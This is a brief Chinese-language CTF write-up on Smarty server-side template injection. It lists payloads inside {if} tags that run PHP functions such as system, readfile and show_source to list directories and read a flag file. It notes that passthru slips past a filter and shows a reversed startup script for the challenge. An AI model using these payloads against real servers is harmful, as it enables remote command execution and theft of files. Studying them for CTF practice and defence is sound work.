smarty模板注入常用的payload
常用payload
常用payload
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
smarty中的{if}标签中可以执行php语句
随便传参可以发现有东西出来
可以发现这个被计算了,说明可以利用,但是有很多参数都被过滤了
可以使用的是参数有passthru,参数利用发现内容
查看start.sh可以看到代码内容
倒叙排列的而已
done
sleep 1000
do
while test "1" = "1"
export T=$RANDOM
FLAG=not_flag
export FLAG=not_flag
chmod 444 /_$T
echo $FLAG > /_$T
T=$RANDOM
export T=$RANDOM
service apache2 start
#!/usr/bin/env bash
